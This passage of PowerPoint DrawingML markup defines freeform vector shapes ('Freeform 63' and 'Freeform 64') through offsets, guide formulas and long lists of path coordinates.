                      <a:lnTo>
                        <a:pt x="147" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="514" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="714" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="724" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="730" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="730" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="477"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="704" y="519"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="677" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="608"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="608"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="682"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="520" y="698"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="692"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="672"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="326" y="640"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="304" y="619"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="509"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="525"/>
                      </a:ln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8" name="Freeform 63"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7016750" y="5294313"/>
                  <a:ext cx="204788" cy="195262"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 289 w 569"/>
                    <a:gd name="T1" fmla="*/ 367 h 541"/>
                    <a:gd name="T2" fmla="*/ 331 w 569"/>
                    <a:gd name="T3" fmla="*/ 393 h 541"/>
                    <a:gd name="T4" fmla="*/ 373 w 569"/>
                    <a:gd name="T5" fmla="*/ 409 h 541"/>
                    <a:gd name="T6" fmla="*/ 410 w 569"/>
                    <a:gd name="T7" fmla="*/ 409 h 541"/>
                    <a:gd name="T8" fmla="*/ 426 w 569"/>
                    <a:gd name="T9" fmla="*/ 404 h 541"/>
                    <a:gd name="T10" fmla="*/ 436 w 569"/>
                    <a:gd name="T11" fmla="*/ 388 h 541"/>
                    <a:gd name="T12" fmla="*/ 452 w 569"/>
                    <a:gd name="T13" fmla="*/ 362 h 541"/>
                    <a:gd name="T14" fmla="*/ 447 w 569"/>
                    <a:gd name="T15" fmla="*/ 331 h 541"/>
                    <a:gd name="T16" fmla="*/ 431 w 569"/>
                    <a:gd name="T17" fmla="*/ 299 h 541"/>
                    <a:gd name="T18" fmla="*/ 478 w 569"/>
                    <a:gd name="T19" fmla="*/ 162 h 541"/>
                    <a:gd name="T20" fmla="*/ 515 w 569"/>
                    <a:gd name="T21" fmla="*/ 194 h 541"/>
                    <a:gd name="T22" fmla="*/ 557 w 569"/>
                    <a:gd name="T23" fmla="*/ 262 h 541"/>
                    <a:gd name="T24" fmla="*/ 568 w 569"/>
                    <a:gd name="T25" fmla="*/ 294 h 541"/>
                    <a:gd name="T26" fmla="*/ 557 w 569"/>
                    <a:gd name="T27" fmla="*/ 367 h 541"/>
                    <a:gd name="T28" fmla="*/ 510 w 569"/>
                    <a:gd name="T29" fmla="*/ 446 h 541"/>
                    <a:gd name="T30" fmla="*/ 488 w 569"/>
                    <a:gd name="T31" fmla="*/ 472 h 541"/>
                    <a:gd name="T32" fmla="*/ 441 w 569"/>
                    <a:gd name="T33" fmla="*/ 514 h 541"/>
                    <a:gd name="T34" fmla="*/ 415 w 569"/>
                    <a:gd name="T35" fmla="*/ 525 h 541"/>
                    <a:gd name="T36" fmla="*/ 368 w 569"/>
                    <a:gd name="T37" fmla="*/ 535 h 541"/>
                    <a:gd name="T38" fmla="*/ 321 w 569"/>
                    <a:gd name="T39" fmla="*/ 535 h 541"/>
                    <a:gd name="T40" fmla="*/ 279 w 569"/>
                    <a:gd name="T41" fmla="*/ 519 h 541"/>
                    <a:gd name="T42" fmla="*/ 231 w 569"/>
                    <a:gd name="T43" fmla="*/ 499 h 541"/>
                    <a:gd name="T44" fmla="*/ 147 w 569"/>
                    <a:gd name="T45" fmla="*/ 436 h 541"/>
                    <a:gd name="T46" fmla="*/ 64 w 569"/>
                    <a:gd name="T47" fmla="*/ 362 h 541"/>
                    <a:gd name="T48" fmla="*/ 32 w 569"/>
                    <a:gd name="T49" fmla="*/ 320 h 541"/>
                    <a:gd name="T50" fmla="*/ 11 w 569"/>
                    <a:gd name="T51" fmla="*/ 278 h 541"/>
                    <a:gd name="T52" fmla="*/ 0 w 569"/>
                    <a:gd name="T53" fmla="*/ 236 h 541"/>
                    <a:gd name="T54" fmla="*/ 0 w 569"/>
                    <a:gd name="T55" fmla="*/ 189 h 541"/>
                    <a:gd name="T56" fmla="*/ 6 w 569"/>
                    <a:gd name="T57" fmla="*/ 162 h 541"/>
                    <a:gd name="T58" fmla="*/ 37 w 569"/>
                    <a:gd name="T59" fmla="*/ 110 h 541"/>
                    <a:gd name="T60" fmla="*/ 53 w 569"/>
                    <a:gd name="T61" fmla="*/ 78 h 541"/>
                    <a:gd name="T62" fmla="*/ 116 w 569"/>
                    <a:gd name="T63" fmla="*/ 26 h 541"/>
                    <a:gd name="T64" fmla="*/ 132 w 569"/>
                    <a:gd name="T65" fmla="*/ 10 h 541"/>
                    <a:gd name="T66" fmla="*/ 216 w 569"/>
                    <a:gd name="T67" fmla="*/ 0 h 541"/>
                    <a:gd name="T68" fmla="*/ 263 w 569"/>
                    <a:gd name="T69" fmla="*/ 10 h 541"/>
                    <a:gd name="T70" fmla="*/ 305 w 569"/>
                    <a:gd name="T71" fmla="*/ 31 h 541"/>
                    <a:gd name="T72" fmla="*/ 405 w 569"/>
                    <a:gd name="T73" fmla="*/ 94 h 541"/>
                    <a:gd name="T74" fmla="*/ 258 w 569"/>
                    <a:gd name="T75" fmla="*/ 336 h 541"/>
                    <a:gd name="T76" fmla="*/ 231 w 569"/>
                    <a:gd name="T77" fmla="*/ 136 h 541"/>
                    <a:gd name="T78" fmla="*/ 211 w 569"/>
                    <a:gd name="T79" fmla="*/ 126 h 541"/>
                    <a:gd name="T80" fmla="*/ 190 w 569"/>
                    <a:gd name="T81" fmla="*/ 121 h 541"/>
                    <a:gd name="T82" fmla="*/ 158 w 569"/>
                    <a:gd name="T83" fmla="*/ 121 h 541"/>
                    <a:gd name="T84" fmla="*/ 142 w 569"/>
                    <a:gd name="T85" fmla="*/ 131 h 541"/>
                    <a:gd name="T86" fmla="*/ 127 w 569"/>
                    <a:gd name="T87" fmla="*/ 147 h 541"/>
                    <a:gd name="T88" fmla="*/ 116 w 569"/>
                    <a:gd name="T89" fmla="*/ 178 h 541"/>
                    <a:gd name="T90" fmla="*/ 116 w 569"/>
                    <a:gd name="T91" fmla="*/ 194 h 541"/>
                    <a:gd name="T92" fmla="*/ 121 w 569"/>
                    <a:gd name="T93" fmla="*/ 215 h 541"/>
                    <a:gd name="T94" fmla="*/ 142 w 569"/>
                    <a:gd name="T95" fmla="*/ 246 h 541"/>
                    <a:gd name="T96" fmla="*/ 190 w 569"/>
                    <a:gd name="T97" fmla="*/ 283 h 541"/>
                    <a:gd name="T98" fmla="*/ 279 w 569"/>
                    <a:gd name="T99" fmla="*/ 168 h 5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569" h="541">
                      <a:moveTo>
                        <a:pt x="289" y="367"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="289" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="431" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="400" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="536" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347" y="540"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="519"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="64" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="64" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="358" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="405" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="431" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="367"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="231" y="136"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="231" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="211" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="273"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="13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9" name="Freeform 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7121525" y="5149850"/>
                  <a:ext cx="206375" cy="190500"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 226 w 574"/>
                    <a:gd name="T1" fmla="*/ 142 h 531"/>
                    <a:gd name="T2" fmla="*/ 189 w 574"/>
                    <a:gd name="T3" fmla="*/ 131 h 531"/>
                    <a:gd name="T4" fmla="*/ 158 w 574"/>
                    <a:gd name="T5" fmla="*/ 131 h 531"/>
                    <a:gd name="T6" fmla="*/ 147 w 574"/>
                    <a:gd name="T7" fmla="*/ 136 h 531"/>
                    <a:gd name="T8" fmla="*/ 132 w 574"/>
                    <a:gd name="T9" fmla="*/ 152 h 531"/>
                    <a:gd name="T10" fmla="*/ 121 w 574"/>
                    <a:gd name="T11" fmla="*/ 194 h 531"/>
                    <a:gd name="T12" fmla="*/ 121 w 574"/>
                    <a:gd name="T13" fmla="*/ 215 h 531"/>
                    <a:gd name="T14" fmla="*/ 132 w 574"/>
                    <a:gd name="T15" fmla="*/ 236 h 531"/>
                    <a:gd name="T16" fmla="*/ 179 w 574"/>
                    <a:gd name="T17" fmla="*/ 278 h 531"/>
                    <a:gd name="T18" fmla="*/ 247 w 574"/>
                    <a:gd name="T19" fmla="*/ 325 h 531"/>
                    <a:gd name="T20" fmla="*/ 320 w 574"/>
                    <a:gd name="T21" fmla="*/ 373 h 531"/>
                    <a:gd name="T22" fmla="*/ 352 w 574"/>
                    <a:gd name="T23" fmla="*/ 388 h 531"/>
                    <a:gd name="T24" fmla="*/ 378 w 574"/>
                    <a:gd name="T25" fmla="*/ 399 h 531"/>
                    <a:gd name="T26" fmla="*/ 420 w 574"/>
                    <a:gd name="T27" fmla="*/ 399 h 531"/>
                    <a:gd name="T28" fmla="*/ 436 w 574"/>
                    <a:gd name="T29" fmla="*/ 388 h 531"/>
                    <a:gd name="T30" fmla="*/ 452 w 574"/>
                    <a:gd name="T31" fmla="*/ 373 h 531"/>
                    <a:gd name="T32" fmla="*/ 463 w 574"/>
                    <a:gd name="T33" fmla="*/ 341 h 531"/>
                    <a:gd name="T34" fmla="*/ 452 w 574"/>
                    <a:gd name="T35" fmla="*/ 315 h 531"/>
                    <a:gd name="T36" fmla="*/ 441 w 574"/>
                    <a:gd name="T37" fmla="*/ 294 h 531"/>
                    <a:gd name="T38" fmla="*/ 378 w 574"/>
                    <a:gd name="T39" fmla="*/ 241 h 531"/>
                    <a:gd name="T40" fmla="*/ 457 w 574"/>
                    <a:gd name="T41" fmla="*/ 131 h 531"/>
                    <a:gd name="T42" fmla="*/ 530 w 574"/>
                    <a:gd name="T43" fmla="*/ 194 h 531"/>
                    <a:gd name="T44" fmla="*/ 567 w 574"/>
                    <a:gd name="T45" fmla="*/ 262 h 531"/>
                    <a:gd name="T46" fmla="*/ 573 w 574"/>
                    <a:gd name="T47" fmla="*/ 304 h 531"/>
                    <a:gd name="T48" fmla="*/ 552 w 574"/>
                    <a:gd name="T49" fmla="*/ 388 h 531"/>
                    <a:gd name="T50" fmla="*/ 525 w 574"/>
                    <a:gd name="T51" fmla="*/ 430 h 531"/>
                    <a:gd name="T52" fmla="*/ 463 w 574"/>
                    <a:gd name="T53" fmla="*/ 504 h 531"/>
                    <a:gd name="T54" fmla="*/ 426 w 574"/>
                    <a:gd name="T55" fmla="*/ 525 h 531"/>
                    <a:gd name="T56" fmla="*/ 383 w 574"/>
                    <a:gd name="T57" fmla="*/ 530 h 531"/>
                    <a:gd name="T58" fmla="*/ 289 w 574"/>
                    <a:gd name="T59" fmla="*/ 514 h 531"/>
                    <a:gd name="T60" fmla="*/ 231 w 574"/>
                    <a:gd name="T61" fmla="*/ 488 h 531"/>
                    <a:gd name="T62" fmla="*/ 163 w 574"/>
                    <a:gd name="T63" fmla="*/ 446 h 531"/>
                    <a:gd name="T64" fmla="*/ 52 w 574"/>
                    <a:gd name="T65" fmla="*/ 351 h 531"/>
                    <a:gd name="T66" fmla="*/ 22 w 574"/>
                    <a:gd name="T67" fmla="*/ 304 h 531"/>
                    <a:gd name="T68" fmla="*/ 5 w 574"/>
                    <a:gd name="T69" fmla="*/ 262 h 531"/>
                    <a:gd name="T70" fmla="*/ 5 w 574"/>
                    <a:gd name="T71" fmla="*/ 178 h 531"/>
                    <a:gd name="T72" fmla="*/ 22 w 574"/>
                    <a:gd name="T73" fmla="*/ 136 h 531"/>
                    <a:gd name="T74" fmla="*/ 48 w 574"/>
                    <a:gd name="T75" fmla="*/ 94 h 531"/>
                    <a:gd name="T76" fmla="*/ 111 w 574"/>
                    <a:gd name="T77" fmla="*/ 31 h 531"/>
                    <a:gd name="T78" fmla="*/ 179 w 574"/>
                    <a:gd name="T79" fmla="*/ 0 h 531"/>
                    <a:gd name="T80" fmla="*/ 216 w 574"/>
                    <a:gd name="T81" fmla="*/ 0 h 531"/>
                    <a:gd name="T82" fmla="*/ 299 w 574"/>
                    <a:gd name="T83" fmla="*/ 26 h 531"/>
                    <a:gd name="T84" fmla="*/ 263 w 574"/>
                    <a:gd name="T85" fmla="*/ 163 h 531"/>
                    <a:gd name="T86" fmla="*/ 226 w 574"/>
                    <a:gd name="T87" fmla="*/ 142 h 5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574" h="531">
                      <a:moveTo>
                        <a:pt x="226" y="142"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="226" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="399" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="357"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="573" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="552" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="100" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="351"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="351"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="111" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
